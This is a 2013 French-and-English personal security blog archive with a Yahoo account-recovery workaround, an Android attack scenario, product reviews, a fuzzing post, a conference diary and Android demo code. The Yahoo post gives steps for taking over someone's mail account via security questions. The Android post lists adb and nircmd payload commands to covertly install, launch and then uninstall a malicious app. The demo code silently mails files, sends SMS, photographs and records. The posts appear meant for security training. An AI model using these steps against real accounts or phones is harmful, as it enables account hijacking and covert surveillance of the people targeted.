Vers l'infini et au-delà...! (*): 2013

lundi 11 novembre 2013

Limits of Yahoo security

For the first time (and may be not the last one if you request it dear readers!) I will write this post in English.
Why? Well, the reason is that I have seen many questions related to Yahoo security in forums and I think this post may answer some of the current questions.

What is the story?

Every year I am used to demonstrate how to access to a Yahoo mail account using the well known Sarah Palin vulnerability for the security training I am in charge of. In other words my objective is to access to a Yahoo account using the answers to security questions found on social networks. And every year I see how Yahoo improves their security. Their last security update was to take into account your request to access to the account, but only 24 hours after your request. As my security training last 2 days, I was still able to demonstrate it.

But when I tried to do it this year (2013), I cannot access to security questions to reset my password. I had access only to my backup email. Arrgh!

After some tests I found a way to use my security questions again. How I did it? Here is the trick.
The idea is to lock your account. To do that you try to reset several times your password (you have to click on the link “I have forgotten my password” on the Yahoo login page). After several attempts (understand after several mails sent to your backup email account) then your account is locked and…and you will be able to reset it after 24 hours using your security questions again. Based on my experience we have to try to reset the password 4 times before locking the account.

We did it!

Here are some snapshots of the process.

The account is locked and we have to come back in 24 hours.

24 hours later, again, we have to try to reset the password 4 times before being able to use the security questions. Below, we correctly answered the first security question and we have to answer the second one.

The second answer was correct and we can set the new password. Then we have access to the email account.

This approach is useful in at least 2 use-cases:
• You have lost the access to your backup email and you cannot use it to reset your password
• You want to access to the email account of your target (as usual here is a reminder: you are not allowed to do that and you can be prosecuted)

Note: if you create a new Yahoo email account now, you will not have the possibility to set security questions. This option seems to have been removed from Yahoo policy.

Note: This test was done in October 2013. Keep in mind that Yahoo is used to update the security behavior. So you may have to adapt this scenario!

dimanche 10 novembre 2013

Envoyez des mails avec votre téléphone en toute sécurité !

Il y a quelques mois je vous présentais dans l’article Signer et encrypter un document sur un téléphone une solution permettant de signer et encrypter un mail. Cette solution était plus une preuve de concept qu’un vrai produit.
Cette fois la solution que je vous présente est un vrai produit, et ce produit peut être utilisé gratuitement dans le cadre d’une démonstration. C’est la solution « Regimail » de la société « Regify »

« Regimail » permet d’encrypter aisément les mails entre utilisateurs sans la contrainte du déploiement et de la maintenance d’une infrastructure à clefs publiques (PKI). C’est sa force !

Du point de vue de l’utilisateur l’expérience est la suivante : vous devez tout d’abord créer un compte « Regimail » sur le portail de démonstration de « Regify » : https://portal.regify.com

Vous recevez un mail contenant un lien d’activation sur lequel vous allez saisir le code d’activation qui vous est envoyé par SMS dans notre cas. Un mot de passe est généré automatiquement.

Une fois le compte créé, vous pouvez télécharger l’application mobile « Regimail » dans l’environnement de votre choix. Dans notre cas nous choisissons d’utiliser un téléphone « Android ».

Après avoir configuré votre application « mobile » en saisissant votre nom d’utilisateur et votre mot de passe vous pouvez envoyer un mail

Lors de l’envoi du mail, l’application « Regimail » propose de choisir le client mail à utiliser (si plusieurs clients sont installés sur votre téléphone) pour l’envoi de ce mail. Dans notre cas nous choisissons « Gmail » associé à l’adresse philippe.biton@gmail.com

L’email est affiché avant l’envoi.

Un mail de notification est ensuite envoyé automatiquement à l’émetteur pour confirmer l’envoi du message. Lorsque le message sera lu par le destinataire alors l’émetteur recevra également une notification de lecture.

La procédure que Basile Drancers doit suivre pour pouvoir lire le contenu du mail est parfaitement décrite dans le mail envoyé. Le processus est très facile à utiliser.

Si Basile Drancers utilises Microsoft Outlook, qu’il dispose d’un compte « Regimail » et qu’il a déjà installé le plug-in « Outlook » alors il n’a plus qu’à double-cliquer sur le fichier « .rgf » pour lancer l’application « Regimail » et visualiser le contenu du mail.

Voici une vue des paramètres de votre client mail « Android ». On peut noter que dans notre cas le fournisseur de services est « Regify » et qu’il existe de nombreux autres fournisseurs proposant leurs propres spécificités.

Du point de vue de l’expert en sécurité, voici l’argumentaire de «Regify» :
• L’architecture de la solution « Regimail » est à 2 niveaux distincts et indépendants: le fournisseur de service de clearing et le fournisseur de la solution « Regimail ».
• Le chiffrement du message est fait avec AES 256
• Les échanges entre les clients et les fournisseurs sont basés sur RSA (1024 bits) et SSL
• Les échanges entre les fournisseurs sont basés sur un VPN privé
• Ni le fournisseur du service de clearing, ni le fournisseur de la solution « Regimail » ne sont à aucun moment en possession de l’email
• Le fournisseur de la solution « Regimail » ne peut accèder ni au « hash » du fichier « .rgf », ni à la clef symétrique AES 256. Il n’a donc pas accès au contenu du message
• Le fournisseur du service de clearing remplit le rôle de gardien des clefs et des « hashs ». Ce service n’a aucune connaissance ni des utilisateurs, ni des contenus
• En résumé, d’un côté, le fournisseur du service de clearing ne connaît ni l’expéditeur d’un mail, ni le destinataire et il n’a jamais accès à son contenu. D’un autre côté, le fournisseur de la solution « Regimail » n’a pas accès à la clef qui a servie à chiffrer le message.

Bien entendu, pour des raisons légales, un tiers autorisé à intercepter légalement une communication «Regify» doit être en possession du message respectif. Assisté par le fournisseur concerné, ce tiers peut accéder aux infirmations telles que le message pour lequel le fournisseur du service de clearing fournira la clef de déchiffrement respective après une demande spéciale et exceptionnelle.

A première vue il semblerait qu'un point pouvant être améliorer dans cette solution soit la phase d’authentification. Mais je comprends que « Regify » laisse le soin à ses fournisseurs de gérer l’authentification. Il est donc nécessaire, davantage pour une entreprise que pour un particulier, de bien choisir son fournisseur « Regify » avec le bon nombre de facteurs d’authentification.

samedi 9 novembre 2013

Utilisez votre téléphone à partir de votre ordinateur !

Devant votre intérêt pour l’article Afficher l’écran de votre téléphone sur votre ordinateur qui date d’Octobre 2012, je dois vous informer que visualiser l’écran de votre téléphone Android sur votre ordinateur est devenu un jeu d’enfants.

Souvenez-vous, avec Droid@Screen un certain nombre de pré-requis étaient nécessaires. Avec MyMobiler tout devient simple.

Voici les étapes à suivre :

1. Comme toujours vous devez autoriser l’option « USB Debugging » sur votre téléphone (confer article précédent). MyMobiler vous permet également d’utiliser une connexion Wifi entre votre ordinateur et votre téléphone

2. Et comme toujours vous devez installer un pilote USB pour votre téléphone (confer Afficher l’écran de votre téléphone sur votre ordinateur)

3. Télécharger et installer MyMobiler http://mymobiler.com/ sur votre ordinateur

4. Lancer MyMobiler

Vous voyez apparaître une petite icône en forme de téléphone.

5. Connecter votre téléphone avec votre câble USB

6. Au travers de MyMobiler vous pouvez installer l’application Android nécessaire au bon fonctionnement de MyMobiler directement sur votre téléphone

7. Réaliser la connexion entre MyMobiler à l’application installée sur votre téléphone

8. Puis vous pouvez visualiser votre téléphone sur votre ordinateur

Et, cerise sur le gâteau, vous pouvez jouer avec votre téléphone directement avec votre souris. Vous pouvez par exemple fermer la fenêtre de MyMobiler sur votre téléphone en cliquant sur « Close ». Tout simplement génial !

9. Au travers de MyMobiler vous pouvez également désinstaller l’application Android après usage

Vous trouverez plus de détails sur les options de configuration de MyMobiler sur l’ordinateur http://mymobiler.com/android-setup-start.html#desktopsetup et sur votre téléphone Android http://mymobiler.com/android-setup-start.html#androidsetup

PS : Merci à Didier qui devrait se reconnaître !

dimanche 29 septembre 2013

Un trou de sécurité dans Android...c’est à voir!

Vous avez tous entendu parlé de la possibilité d'installer une application Android malveillante (bug 8219321 et bug 9695860) en la signant avec une application bien officielle.

Pour plus de détails voir le blog de Jay Freeman (@saurik)

On trouve également sur le github de Fuzion24 quelques "apk" (comprendre applications Android) modifiés qui permettent d'installer une application malveillante signée en utilisant ces bugs.

Essayons les!

On copie d'abord l'"apk" sur notre téléphone puis on installe l'application.

On obtient alors un magnifique message en provenance du Google Play Store nous informant que cette application est malveillante car elle exploite un bug connu, et que l'installer c'est prendre un très gros risque!

Continuons tout de même!

On obtient alors un message nous informant que notre paramétrage interdit l'installation des applications en dehors du Google Play Store.

Conseil: vérifier le paramétrage de votre téléphone permettant d’interdire l’installation d’applications en dehors du Google Play Store

Quant on sait que Google affirme qu'il n'y a aucune application compromise dans le Google Play Store, le risque semble faible

Déception! Ou pas!

Maintenant toutes ces manipulations m'ont donné une idée!

Pré-requis: Imaginons que le paramètre "USB Debugging" que l'on peut trouver dans "Settings / Developer Options" soit activé. Vous avez par exemple eu besoin d'afficher l'écran de votre téléphone sur votre ordinateur (pour plus d'informations voir "Afficher l’écran de votre téléphone sur votre ordinateur") et vous n'avez pas désactivé l'option.

Dans ce cas, l'attaquant peut installer son environnement Android sur sa clef USB et lancer l'installation de l'"apk" à partir de sa clef. A condition bien sûr que la cible ait son téléphone connecté en USB sur son PC (pour recharger son téléphone ou bien transfèrer des données comme des photos par exemple). Alors si l'attaquant réussi à connecter sa clef USB sur le PC de la cible et à executer son programme, c'est gagné.

En effet si je lance la commande:

> adb install -r SecurityDemo.apk

alors l'installation réussie.

Une autre approche consiste à inciter votre cible à connecter son téléphone sur votre PC.

Référez vous au blog "La clef USB: le maillon faible ?" qui décrit quelques techniques permettant d'automatiser l'exécution de commande à partir d'une clef USB.

La charge utile pour installer et lancer l'application malveillante pourrait alors ressembler à:

> nircmd.exe execmd /Android/SDK/platform-tools/adb install -r /Android/Projects/SecurityDemo/bin/SecurityDemo.apk
> nircmd.exe execmd /Android/SDK/platform-tools/adb shell am start -n com.proxia.securitydemo/com.proxia.securitydemo.SecurityDemo

Il est aussi possible pour faire disparaître les traces de notre passage d'arrêter l'application et de la désinstaller avec les commandes suivantes:

> adb shell am force-stop com.proxia.securitydemo
> adb uninstall com.proxia.securitydemo

Et ca marche!

dimanche 22 septembre 2013

Le fuzzing appliqué à la validation des applications

A OHM 2013 (voir l'article "Mon OHM à moi…") en sortant de la présentation de @agarri_fr aka Nicolas Grégoire (excellente présentation par ailleurs appelé “Low-cost vulnerability research: XSLT fuzzing as a case study”), je me suis accordé un instant de réflexion, assis dans l’herbe, en sirottant un Club-Maté, boisson de tout OHMien qui se respecte, et là j’ai pris une décision, j’allais enfin passer de la théorie du fuzzing à la pratique.

Qu'est ce que le fuzzing? (source: Wikipedia)

Le fuzzing est une technique pour tester des logiciels. L'idée est d'injecter des données aléatoires dans les entrées d'un programme. Si le programme échoue (par exemple en plantant ou en générant une erreur), alors il y a des défauts à corriger.
Le grand avantage du fuzzing est que l'écriture de tests est extrêmement simple, ne demande aucune connaissance du fonctionnement du système et permet de trouver des vulnérabilités facilement. D'ailleurs, le fuzzing est également utilisé pour traquer des failles de sécurité .
Cependant la principale limitation du fuzzing est sa grande consommation de ressources mémoire, disque dur, CPU.

Quels sont les outils dont nous disposons?

Il existe une multitude de fuzzers dans différents languages, plus ou moins faciles à utiliser (comme Sulley par exemple).
Si on se focalise sur les outils les plus simples, on peut lister les outils proposés par le CERT de Carnegie Mellon:

BFF (Basic fuzzing Framework) - http://www.cert.org/vuls/discovery/bff.html
FOE (Failure Observation Engine) - http://www.cert.org/vuls/discovery/foe.html

BFF
Le CERT Basic Fuzzing Framework (BFF) est un outil logiciel de test permettant de trouver des défauts dans les applications fonctionnant sous Linux et Mac OS X. BFF effectue des mutations sur les données en entrée du logiciel à tester. Une mutation consiste à prendre une donnée bien formattée et à la corrompre de différentes façons à la recherche de la mutation qui générera un crash.

FOE
The CERT Failure Observation Engine (FOE) est un outil logiciel de test permettant de trouver des défauts dans les applications fonctionnant sous Windows. FOE effectue également des mutations sur les données en entrée du logiciel à tester

Que fait @agarri_fr avec le fuzzing?

@agarri_fr (http://www.agarri.fr/) est un chercheur en vulnérabilités à ses heures. Ses recherches se focalisent actuellement sur les parsers autour de XML et de XSLT. Il utilise principalement le fuzzer Radamsa (http://code.google.com/p/ouspg/wiki/Radamsa). Sur cette base @agarri_fr a découvert de nombreuses vulnérabilités dont:

Microsoft MSXML (MS13-002 / CVE-2013-0007)
Acrobat Reader (CVE-2012-1525 / CVE-2012-1530)

Pour information il existe une extension Radamsa pour Burp Suite.
Si vous souhaitez quelques informations sur XML et XSLT vous pouvez jeter un oeil à l’article Les transformations “XSLT” fournissent toujours de précieux services!

Et comment le fuzzing est-il utilisé dans une phase de validation?

Le chercheur en sécurité informatique Charlie Miller a refusé en 2010 de dévoiler les vulnérabilités "0-day" trouvées dans le code de logiciels célèbres (contrairement au règlement du concours de sécurité informatique Pwn2Own), afin de protester contre les éditeurs qui n'utilisent pas assez cette technique simple selon lui.

Tout est dit! Le fuzzing devrait faire partie intégrante de toutes les phases de validation.

Et moi je fais quoi avec tout ca?

Tout d'abord je m'amuse.

Et à titre d'exercice, j'ai installé FOE dans un environnement Windows avec pour objectif de trouver des vulnérabilités chez quelques éditeurs! Bon ca parait simple sur le papier mais ca l'est beaucoup moins dans la réalité (mais je ne suis pas à l'abri de trouver quelque chose)

A vous de jouer! Et peut-être allez vous découvrir un "0-day" !

samedi 21 septembre 2013

Mon OHM à moi...

Hier il a plu à Amsterdam ! Ce matin le soleil semble être au rendez-vous.

J’arrive à Central Station. Je cherche le quai, direction Alkmaar. Surtout ne pas se tromper de train ! Je ne souhaite pas rater la cérémonie d’ouverture.

Le quai semble vide. Je suis en avance. Quelques hommes et femmes me rejoignent. Peut être y’en a-t-il parmi eux qui vont à OHM ! J’observe, je scrute, à la recherche d’indices ! Sur une veste, un badge, je lis difficilement « Free… ». Je me rapproche : « Free Softwares ». Si on ajoute à ça, un sac à dos et une tente, la probabilité est suffisante pour que j’entame la conversation.

« Excuse me! Are you going to OHM ? »

«Yes! » dit-elle

Son accent anglais ressemble terriblement au mien. Serait-elle française ?

«Vous êtes française ?»
« Oui » répond-elle

La journée commence bien.

Le trajet semble être très court. Nous arrivons à destination, Heerhugowaard. De la gare, le chemin est soigneusement fléché jusqu’ à la navette qui doit nous emmener au Walhalla.

Un détail m’inquiète cependant. Notre aimable chauffeur porte des bottes. Le Walhalla serait-il dans la boue ?

La voiture sort de la ville. Chaque instant qui passe semble nous éloigner un peu plus de la civilisation. Sensation de téléportation dans un univers parallèle !

Au loin nous apercevons quelques tentes. Nous sommes arrivés.

Première étape, contrôle des billets et remise du bracelet. Ça y est ! Après 6 mois d’attente nous voilà dans l’arène !

Finalement la pluie n’a pas fait de dégâts. Le terrain est pratiquable. Jusqu’ici tout va bien !

Deuxième étape, retrouver Bertrand (*).

Bertrand présente ses travaux de recherche dans l’après-midi. Il est ici avec sa femme et ses enfants. Son SMS matinal m’indiquait que je pourrais le retrouver dans le « Family Village » à l’opposé du « Noisy Square » ! Choix stratégique !

Le « Family Village » est bien rempli. Quelques enfants sont déjà à la garderie. Ils semblent être très concentrés devant leurs ordinateurs ! Eh oui, la garderie d’OHM n’est pas une garderie comme les autres : les enfants de « hacker » doivent avoir des activités de « hacker ».

J’aperçois Bertrand au loin. Après avoir partagé un Club-Maté, la boisson locale, Bertrand me fait découvrir les lieux. Cet endroit est vraiment surprenant, c’est une véritable ville au milieu de nulle part!

Après une petite visite de sa tente tout confort, Bertrand part à la recherche d’un peu de tranquillité pour finir de préparer sa présentation.

Bon, à moi de jouer ! Je vais pouvoir assister à quelques conférences. Mais lesquelles choisir, il y en a au moins 4 officielles en parallèle, sans compter les présentations improvisées dans les villages comme celui de la « French Embassy ». Le dilemme ! Je décide de faire confiance au hasard, ce n’est pas très scientifique tout ça mais ne l’oublions pas, je suis en vacances!

En traversant un des nombreux ponts d’OHM, j’aperçois sur l’eau un crocodile gonflable sur le dos ! Mort peut être ! Tout est réellement sous-contrôle ! Les enfants peuvent être rassurés.

J’erre de tente en tente, de conférence en conférence, récupérant un autocollant par ci, prenant une photo par là, m’arrêtant souvent pour découvrir des domaines plus surprenant les uns que les autres, du «lockpicking» au journalisme en Syrie en passant par les «whistleblowers» (lanceurs d’alertes)! Je m’imprègne de l’ambiance, je veux tout voir et tout sentir, je veux garder ce souvenir intact pour mon retour en France.

La nuit tombe, salué par l’arrivée d’un soldat de l’empire galactique pour le plaisir des petits et des grands. Les journalistes se précipitent pour l’interviewer. Décalé !

J’oublie tout, je voudrais rester pour toujours ici, devenir un habitant d’Ohm-Ville ! Un sursaut de lucidité me ramène brutalement à la réalité, Amsterdam, le train, la navette, quelle heure est-il ?

C’est la fin ! Je m’arrache de ce lieu envoûtant ! J’attends la navette. Prés de moi, deux personnes parlent. Je tends l’oreille:

« What is this conference about ? » dit la personne en charge de la sécurité de l’entrée du camp
« It is about hacking! But you will find free-thinkers, philosophers, activists, geeks, scientists, artists and a whole bunch of people interested in lots of interesting stuff!” répond un organisateur
“It sounds good! I may find interesting stuff there, you know! I always like to learn new things!” admet le garde

Tout est dit!

(*) pour des raisons d'anonymat le prénom a été modifié.

vendredi 30 août 2013

Sécurité des applications Android

Depuis Hack In Paris 2012 et la présentation de Georgia Weidman (@georgiaweidman) sur la sécurité Android, j'ai envie moi aussi de développer ma propre application.

Eh bien c'est fait!

Mon objectif est double:

Vérifier la force des contre-mesures que j'ai appliqué sur mon téléphone (le terme de contre-mesures est un peu fort)
Avoir une idée de ce qu'il est possible de faire

Pour répondre au premier point il est tout d'abord nécessaire de vous présenter l'application "Data Defender" développé par la société Authentec.

Cette application permet de protéger l'accès à vos applications critiques (gérant des données privées) comme le mail, l'envoi de SMS, l'accès à votre système de fichiers ou la prise de photo.

Vous choisissez quelles sont les applications que vous souhaitez protéger et lorsque que vous souhaitez y accéder vous devez saisir soit un code PIN ou un pattern.

C'est bien pratique!

Mais que se passe t'il si l'appel à votre application protégée est fait à partir d'une autre application malveillante!

Pour vérifier le comportement de “Data Defender” j'ai développé une application qui essaie d'envoyer un mail à partir des clients mail présents sur le téléphone. Data Defender est alors appelé et me demande de saisir mon pattern pour accéder au client mail.

On s'en doutait un peu!

Mais, malgré tout, est-il possible d'envoyer un mail à l'insu de l'utilisateur, d'envoyer un SMS sans laisser de trace dans l'historique, d'accéder au système de fichiers, de prendre une photo ou bien d'enregistrer une conversion?

La réponse à toutes ces questions est "oui".

Bien entendu l'application doit avoir les droits d'accès nécessaires pour effectuer toutes ces opérations. Et vous avez remarqué que lorsque vous installez une application la liste des droits d'accès requis par l'application vous est présenté afin de vous prévenir d'une éventuelle menace. Mais qui parmi nous à refusé d'installer une application car elle était un peu trop gourmande en droits d'accès! Pas moi!

A titre d'exemple voici un sous-ensembles des droits d'accès de l'application Facebook.

Ca fait peur non?

Dans ce qui suit je vous propose de jeter un oeil au code permettant de réaliser toutes ces opérations. Le code se lit facilement c'est pourquoi je me contente de vous le donner tel quel. Seul la partie de code décrivant la fonction est donnée.

Envoi d'un mail (source: Jon Simon)

Pour réaliser l'envoi d'un mail il est nécessaire de créer un compte Gmail (ne servant qu'à l'envoi du mail) et de renseigner les paramètres correspondants dans le code.

public void sendGMail() {

            Thread thread = new Thread(new Runnable(){

            @Override

            public void run() {

                try {

                    //Your code goes here

                    Mail m = new Mail("yourfakeaccount@gmail.com", "yourpassword");        

                    String[] toArr = {emailAddress.getText().toString()};       

                    m.setTo(toArr);       

                    m.setFrom("yourfakeaccount@gmail.com");       

                    m.setSubject("Security Demo");       

                    m.setBody(emailText.getText().toString());        

                    m.addAttachment(Environment.getExternalStorageDirectory().getPath() + "/securitydemo.txt");          

                    if(m.send()) {           

                        Toast.makeText(SendEmailDemo.this, "Email was sent successfully.", Toast.LENGTH_LONG).show();         

                    } else {           

                        Toast.makeText(SendEmailDemo.this, "Email was not sent.", Toast.LENGTH_LONG).show();         

                    }       

                } catch(Exception e) {         

                    Log.e("MailApp", "Could not send email", e);       

                }    

            }

        });

        thread.start(); 

}

Envoi d'un SMS (source: Gupta.Avinash)

public void sendLongSMS() {         

  

    SmsManager smsManager = SmsManager.getDefault();

    ArrayList<String> parts = smsManager.divideMessage(messageText.getText().toString()); 

    smsManager.sendMultipartTextMessage(phoneNumber.getText().toString(), null, parts, null, null);

    

    Toast.makeText(getApplicationContext(), "Message Sent!", Toast.LENGTH_LONG).show();

}

Accès au système de fichiers (source: Stackoverflow)

public void writeFile() {

    try {

        File sdCard = Environment.getExternalStorageDirectory();

        File dir = new File (sdCard.getAbsolutePath());

        File file= new File(dir, fileName.getText().toString());

        System.out.println(file.getAbsolutePath());

  

        FileOutputStream fOut = new FileOutputStream(file);

  

        OutputStreamWriter myOutWriter = new OutputStreamWriter(fOut);

        myOutWriter.append(fileContent.getText());

        myOutWriter.close();

        fOut.close();  

        Toast.makeText(getApplicationContext(), "File saved!", Toast.LENGTH_LONG).show();

    } catch (IOException e) {

          Toast.makeText(getApplicationContext(), "Failed to write file", Toast.LENGTH_LONG).show();

    }

}

Prise d'une photo (source: Marko Gargenta)

L'intégralité du fichier "java" est fourni pour ceux qui ne sont pas familiers avec l'utilisation des librairies "Graphique".

package com.proxia.securitydemo;

  

import java.io.FileNotFoundException;

import java.io.FileOutputStream;

import java.io.IOException;

import android.content.Context;

import android.graphics.Canvas;

import android.graphics.Color;

import android.graphics.Paint;

import android.hardware.Camera;

import android.hardware.Camera.PreviewCallback;

import android.util.Log;

import android.view.SurfaceHolder;

import android.view.SurfaceView;

  

class Preview extends SurfaceView implements SurfaceHolder.Callback {    

    private static final String TAG = "Preview";    

    

    SurfaceHolder mHolder;    

    public Camera camera;    

    

    Preview(Context context) {        

        super(context);        

        mHolder = getHolder();        

        mHolder.addCallback(this);        

        mHolder.setType(SurfaceHolder.SURFACE_TYPE_PUSH_BUFFERS);    

    }    

    

    public void surfaceCreated(SurfaceHolder holder) {        

        camera = Camera.open();        

        try {            

            camera.setPreviewDisplay(holder);            

            camera.setPreviewCallback(new PreviewCallback() {                

                

                public void onPreviewFrame(byte[] data, Camera arg1) {                    

                    FileOutputStream outStream = null;                    

                    Preview.this.invalidate();                

                }            

            });        

        } catch (IOException e) {            

            e.printStackTrace();        

        }    

    }    

    

    public void surfaceDestroyed(SurfaceHolder holder) {        

        camera.stopPreview();        

        camera = null;    

    }    

    

    public void surfaceChanged(SurfaceHolder holder, int format, int w, int h) {        

        Camera.Parameters parameters = camera.getParameters();        

        parameters.setPreviewSize(w, h);        

        camera.setParameters(parameters);        

        camera.startPreview();    

    }    

    

    @Override    

    public void draw(Canvas canvas) {        

        super.draw(canvas);        

        Paint p = new Paint(Color.RED);        

        Log.d(TAG, "draw");        

        canvas.drawText("PREVIEW", canvas.getWidth() / 2,                

                canvas.getHeight() / 2, p);    

    }

}



Enregistrement d'une conversation (source: Developer Android)

L'intégralité des fichiers "java" est fourni pour ceux qui ne sont pas familiers avec l'utilisation des librairies "Media".

package com.proxia.securitydemo;

  

import android.app.Activity; 

import android.widget.LinearLayout; 

import android.os.Bundle; 

import android.os.Environment; 

import android.view.Menu;

import android.view.MenuInflater;

import android.view.MenuItem;

import android.view.ViewGroup; 

import android.widget.Button; 

import android.view.View; 

import android.view.View.OnClickListener; 

import android.content.Context; 

import android.content.Intent;

import android.util.Log; 

import android.media.MediaRecorder; 

import android.media.MediaPlayer;  

import java.io.IOException;   

  

public class AudioRecordTest extends Activity {     

    private static final String LOG_TAG = "AudioRecordTest";     

    private static String mFileName = null;      

    private RecordButton mRecordButton = null;     

    private MediaRecorder mRecorder = null;      

    private PlayButton   mPlayButton = null;     

    private MediaPlayer   mPlayer = null;    

    

    private void onRecord(boolean start) {         

        if (start) {             

            startRecording();         

        } else {             

            stopRecording();         

        }     

    }      

    

    private void onPlay(boolean start) {         

        if (start) {             

            startPlaying();         

        } else {             

            stopPlaying();         

        }     

    }      

    

    private void startPlaying() {         

        mPlayer = new MediaPlayer();         

        try {             

            mPlayer.setDataSource(mFileName);             

            mPlayer.prepare();             

            mPlayer.start();         

        } catch (IOException e) {             

            Log.e(LOG_TAG, "prepare() failed");         

        }     

    }      

    

    private void stopPlaying() {         

        mPlayer.release();         

        mPlayer = null;     

    }      

    

    private void startRecording() {         

        mRecorder = new MediaRecorder();         

        mRecorder.setAudioSource(MediaRecorder.AudioSource.MIC);         

        mRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP);         

        mRecorder.setOutputFile(mFileName);         

        mRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB);          

        try {             

            mRecorder.prepare();         

        } catch (IOException e) {             

            Log.e(LOG_TAG, "prepare() failed");         

        }          

        mRecorder.start();     

    }      

    

    private void stopRecording() {        

        mRecorder.stop();         

        mRecorder.release();         

        mRecorder = null;     

    }      

    

    class RecordButton extends Button {         

        boolean mStartRecording = true;          

        OnClickListener clicker = new OnClickListener() {             

            public void onClick(View v) {                 

                onRecord(mStartRecording);                 

                if (mStartRecording) {                     

                    setText("Stop recording");                

                } else {                     

                    setText("Start recording");                 

                }                 

                mStartRecording = !mStartRecording;             

            }         

        };          

        

        public RecordButton(Context ctx) {             

            super(ctx);             

            setText("Start recording");             

            setOnClickListener(clicker);         

        }     

    }      

    

    class PlayButton extends Button {         

        boolean mStartPlaying = true;          

        OnClickListener clicker = new OnClickListener() {             

            public void onClick(View v) {                 

                onPlay(mStartPlaying);                 

                if (mStartPlaying) {                     

                    setText("Stop playing");                 

                } else {                     

                    setText("Start playing");                

                }                 

                mStartPlaying = !mStartPlaying;             

            }         

        };          

        

        public PlayButton(Context ctx) {             

            super(ctx);             

            setText("Start playing");             

            setOnClickListener(clicker);         

        }     

    }      

    

    public AudioRecordTest() {         

        mFileName = Environment.getExternalStorageDirectory().getAbsolutePath();         

        mFileName += "/audiorecordtest.3gp";     

    }     

    

    @Override     

    public void onCreate(Bundle icicle) {         

        super.onCreate(icicle);          

        LinearLayout ll = new LinearLayout(this);         

        mRecordButton = new RecordButton(this);         

        ll.addView(mRecordButton,             

                new LinearLayout.LayoutParams(                 

                        ViewGroup.LayoutParams.WRAP_CONTENT,                 

                        ViewGroup.LayoutParams.WRAP_CONTENT,                

                        0));         

        mPlayButton = new PlayButton(this);         

        ll.addView(mPlayButton,             

                new LinearLayout.LayoutParams(                 

                        ViewGroup.LayoutParams.WRAP_CONTENT,                 

                        ViewGroup.LayoutParams.WRAP_CONTENT,                 

                        0));        

        setContentView(ll);     

    } 

    

    @Override     

    public void onPause() {         

        super.onPause();         

        if (mRecorder != null) {             

            mRecorder.release();             

            mRecorder = null;         

        }          

        if (mPlayer != null) {             

            mPlayer.release();             

            mPlayer = null;         

        }     

    } 

  

    public boolean onPrepareOptionsMenu(Menu menu) 

    {

        super.onPrepareOptionsMenu(menu);

        

        return true;

    }

  

    // ------------------------------------------------------

    // ------------------------------------------------------

    @Override

    public boolean onCreateOptionsMenu(Menu menu) 

    {

        super.onCreateOptionsMenu(menu);

        

        try

        {

            MenuInflater inflater = getMenuInflater();

    

            inflater.inflate(R.menu.securitydemo, menu);

    

            inflater = null;

        }

        catch (Exception e)

        {

        }

  

        return true;

    }

  

    // ------------------------------------------------------

    // ------------------------------------------------------

    @Override

    public boolean onOptionsItemSelected(MenuItem item) 

    {

        switch (item.getItemId()) 

        {

            case R.id.menu_mail: 

            {

                Intent intent = new Intent(this, SendEmailDemo.class);

                this.startActivity(intent);

                finish();

                return true;

            }

    

            case R.id.menu_sd: 

            {

                Intent intent = new Intent(this, WriteSDDemo.class);

                this.startActivity(intent);

                finish();

                return true;

            }

    

            case R.id.menu_sms: 

            {

                Intent intent = new Intent(this, SecurityDemo.class);

                this.startActivity(intent);

                finish();

                return true;

            }

  

            case R.id.menu_picture: 

            {

                Intent intent = new Intent(this, CameraDemo.class);

                this.startActivity(intent);

                finish();

                return true;

            }

  

            case R.id.menu_audio: 

            {

                return true;

            }

        }

        

        return false;

    }

  

  

}

package com.proxia.securitydemo;

  

import java.io.FileNotFoundException;

import java.io.FileOutputStream;

import java.io.IOException;

import java.util.ArrayList;

  

import android.app.Activity;

import android.content.Intent;

import android.hardware.Camera;

import android.hardware.Camera.PictureCallback;

import android.hardware.Camera.ShutterCallback;

import android.os.Bundle;import android.os.Environment;

import android.telephony.SmsManager;

import android.util.Log;

import android.view.Menu;

import android.view.MenuInflater;

import android.view.MenuItem;

import android.view.View;

import android.view.View.OnClickListener;

import android.widget.Button;

import android.widget.FrameLayout;

import android.widget.Toast;

  

public class CameraDemo extends Activity {    

    private static final String TAG = "CameraDemo";    

    Camera camera;    

    Preview preview;    

    Button buttonClick;    

    

    /** Called when the activity is first created. */    

    @Override    

    public void onCreate(Bundle savedInstanceState) {

        super.onCreate(savedInstanceState);

        setContentView(R.layout.activity_picturedemo);

        preview = new Preview(this);

        ((FrameLayout) findViewById(R.id.preview)).addView(preview);

        buttonClick = (Button) findViewById(R.id.buttonClick);

        buttonClick.setOnClickListener(new OnClickListener() {            

            public void onClick(View v) {                

                preview.camera.takePicture(shutterCallback, rawCallback,                        

                        jpegCallback);            

                }        

            });

        

            Log.d(TAG, "onCreate'd");    

        }

    

        ShutterCallback shutterCallback = new ShutterCallback() {        

            public void onShutter() {            

                Log.d(TAG, "onShutter'd");        

                }    

        };    

        

        /** Handles data for raw picture */    

        PictureCallback rawCallback = new PictureCallback() {        

            public void onPictureTaken(byte[] data, Camera camera) {            

                Log.d(TAG, "onPictureTaken - raw");        

                }    

        };    

        

        /** Handles data for jpeg picture */    

        PictureCallback jpegCallback = new PictureCallback() {        

            public void onPictureTaken(byte[] data, Camera camera) {            

                FileOutputStream outStream = null;            

                try {                

                    outStream = new FileOutputStream(Environment.getExternalStorageDirectory().getPath() + "/stolenpicture.jpg");                

                    outStream.write(data);                

                    outStream.close();                

                    Log.d(TAG, "onPictureTaken - wrote bytes: " + data.length);        

                    

                } catch (FileNotFoundException e) {                

                    e.printStackTrace();            

                } catch (IOException e) {                

                    e.printStackTrace();            

                } finally {        

                }            

                Log.d(TAG, "onPictureTaken - jpeg");        

            }    

        };

        

  

        public boolean onPrepareOptionsMenu(Menu menu) 

        {

            super.onPrepareOptionsMenu(menu);

            

            return true;

        }

  

        // ------------------------------------------------------

        // ------------------------------------------------------

        @Override

        public boolean onCreateOptionsMenu(Menu menu) 

        {

            super.onCreateOptionsMenu(menu);

            

            try

            {

                MenuInflater inflater = getMenuInflater();

                inflater.inflate(R.menu.securitydemo, menu);        

                inflater = null;

            }

            catch (Exception e)

            {

            }

  

            return true;

        }

  

        // ------------------------------------------------------

        // ------------------------------------------------------

        @Override

        public boolean onOptionsItemSelected(MenuItem item) 

        {

            switch (item.getItemId()) 

            {

                case R.id.menu_mail: 

                {

                    Intent intent = new Intent(this, SendEmailDemo.class);

